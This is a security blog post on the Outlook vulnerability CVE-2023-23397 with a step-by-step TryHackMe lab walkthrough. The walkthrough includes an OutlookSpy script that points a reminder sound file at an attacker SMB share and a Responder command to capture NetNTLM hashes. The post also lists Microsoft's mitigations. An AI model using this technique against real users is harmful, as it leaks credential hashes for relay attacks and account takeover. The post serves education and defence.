Microsoft Office Outlook Privilege Escalation Vulnerability [CVE-2023-23397]
March’s Patch Tuesday delivered a critical blow to the security landscape with the emergence of CVE-2023-23397, a severe vulnerability found within Outlook. This alarming exploit, which affects all versions of Windows Outlook, has garnered considerable attention due to its 9.8 CVSS rating and its designation as one of two zero-day exploits unveiled on March 14. With the potential for widespread consequences, it is crucial for security teams to stay informed about this vulnerability and its implications. In this blog post, we will delve into the essential details of CVE-2023-23397, providing insights into the risks it poses and offering effective mitigation strategies to safeguard your systems.
Overview of CVE-2023-23397
CVE-2023-23397, a critical privilege elevation and authentication bypass vulnerability, has surfaced as a result of the March Patch Tuesday updates. Regardless of the version of Windows Outlook being used, all are susceptible to this alarming exploit, which earned a daunting 9.8 CVSS rating. Compounding the severity, this vulnerability was one of two zero-day exploits disclosed on March 14, further underscoring the urgency for security teams to address its implications. To shed light on the risks posed by CVE-2023-23397 and equip security teams with effective mitigation strategies, we delve into the intricacies of this vulnerability and its exploitation.
Turning to the inner workings of CVE-2023-23397: the attacker crafts a malicious message carrying an extended MAPI property that contains a Universal Naming Convention (UNC) path. This UNC path points to a remote Server Message Block (SMB) share hosted on an attacker-controlled server. What is alarming is that the vulnerability is triggered regardless of whether the recipient has opened the message.
Upon receiving the malicious message, the victim’s Outlook client unwittingly attempts to authenticate to the attacker’s SMB server. This discloses the victim’s New Technology LAN Manager (NTLM) negotiation message, which the attacker can use to authenticate against other systems that support NTLM authentication. NTLMv2, the latest version of the Windows NTLM authentication protocol, exchanges hashed representations of the user’s credentials, including the username and password. This gives threat actors the opportunity to carry out NTLM relay attacks, potentially compromising additional services or even entire domains if the compromised users hold administrative privileges. It is worth noting that online services such as Microsoft 365 are not susceptible to this particular attack because they do not support NTLM authentication, but the Microsoft 365 Windows Outlook app remains vulnerable.
To understand the underlying mechanism of the vulnerability, we turn our attention to MAPI (Messaging Application Programming Interface). MAPI is the messaging architecture of Microsoft Outlook; it supports the development of Outlook messaging applications and the manipulation of email data. In the context of CVE-2023-23397, the exploit leverages the “PidLidReminderFileParameter” extended MAPI property. This property specifies the audio file to be played when an Outlook reminder for a given object becomes overdue. By setting this property to a UNC path, the attacker causes Outlook to perform NTLM authentication to the remote server, setting the stage for exploitation.
In conclusion, CVE-2023-23397 poses a significant threat to the security of Outlook users. Its critical nature, coupled with the potential for privilege elevation and authentication bypass, demands immediate attention from security teams. By understanding the intricacies of the vulnerability and implementing appropriate mitigation measures, organizations can fortify their systems against this exploit, safeguarding their sensitive information and maintaining the integrity of their networks.
How to Exploit this Vulnerability
To exploit this vulnerability, it is essential to have a controlled testing environment with preconfigured settings. To gain practical experience and better understand the intricacies of this vulnerability, we will be conducting hands-on exercises using the tryhackme platform. You can access the specific exploit exercise by clicking on the following link: https://tryhackme.com/room/outlookntlmleak. By navigating to this exercise, you will be able to actively engage with the exploit and enhance your understanding of its inner workings.
Step 1: To begin exploring and testing the CVE-2023-23397 vulnerability in Outlook, first visit the following link: https://tryhackme.com/room/outlookntlmleak. On the page, locate and click the ‘Start Machine’ option. This starts a pre-configured virtual machine (VM) that contains all the vulnerable components needed to test the vulnerability. Before you can access the VM, you will need to log in to TryHackMe. Once logged in, click the ‘Join Room’ option to gain access to the room and then start the machine. By following these instructions, you can actively engage with the vulnerability and experiment with its implications in a controlled environment.
Step 2: After launching the virtual machine, proceed to initiate the Outlook application and generate a fresh appointment.
Step 3: Our plan involves scheduling an appointment with a reminder that is set to trigger immediately after the recipient receives it. Additionally, we will select the Sound option to adjust the sound file associated with the reminder.
Step 4: We can attempt to configure the path of the sound file to a UNC path that directs to our AttackBox. Afterward, we can proceed by clicking the OK button in the following manner:
However, Outlook silently discards the UNC path and falls back to the default WAV file. This can be verified by reopening the Sound dialogue.
Step 5: If it’s not possible for Outlook to assign a UNC path as the sound file for the reminder, we can utilize the OutlookSpy plugin to accomplish this. With the help of this plugin, you can directly access all of Outlook’s internal settings, including the sound file for the reminder.
To begin, it is necessary to install OutlookSpy. To do this, close Outlook entirely and locate the installer for OutlookSpy on your computer’s desktop. Please ensure that Outlook is closed before running the installer manually.
Step 6: To access the current appointment in OutlookSpy, first select the OutlookSpy tab, then click the CurrentItem button in the toolbar. This opens a window with several options. Next, find the ‘ReminderSoundFile’ option, as shown in the screenshot below.
Step 7: You can view the settings related to the appointment’s reminder through this window. Our objective is to configure the ReminderSoundFile parameter with the UNC path that directs to our AttackBox, and set both ReminderOverrideDefault and ReminderPlaySound to true. Here is an explanation of each parameter:
ReminderPlaySound: A boolean value indicating whether a sound will accompany the reminder.
ReminderOverrideDefault: A boolean value instructing the recipient’s Outlook client to play the sound specified by ReminderSoundFile, instead of the default sound.
ReminderSoundFile: A string containing the file path to the sound file to be used. In our exploit, this path will lead to a fictitious shared folder in our AttackBox.
To achieve the desired configuration, we can use the Script tab and run the following script (the path is a string and must be quoted, and ReminderPlaySound is set as well, as required in Step 7):
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\10.10.174.201\nonexistent\sound.wav"
Note that the IP address above is that of the AttackBox.
Step 8: Please ensure that you click the “Run” button to apply the modifications. You can verify the successful update of values by returning to the Properties tab.
Next, switch to the AttackBox and start the listener by running the following command: “responder -I ens5”.
Once you have completed the necessary steps, remember to save your appointment to incorporate it into your calendar. Ensure that the reminder is configured to 0 minutes, and verify that the appointment aligns with the present time and date, allowing it to activate promptly.
Step 9: Once the reminder prompt appears, return to the AttackBox and take note of the captured NetNTLM hash.
What mitigations can be applied to fix this vulnerability?
The vulnerability tracked as CVE-2023-23397 was exploited here against Outlook Version 1808 (Build 10730.20370); Microsoft has resolved it in subsequent updates.
The mentioned vulnerability is currently being actively exploited in real-world scenarios. To mitigate and prevent this attack, Microsoft suggests several precautionary measures:
Include users in the Protected Users Security Group to prevent the usage of NTLM as an authentication mechanism.
Block outbound TCP 445/SMB traffic from your network to prevent any potential post-exploitation connections.
Utilize the PowerShell script provided by Microsoft to scan your Exchange server and identify any potential attack attempts.
Disable the WebClient service to eliminate the possibility of establishing a WebDAV connection.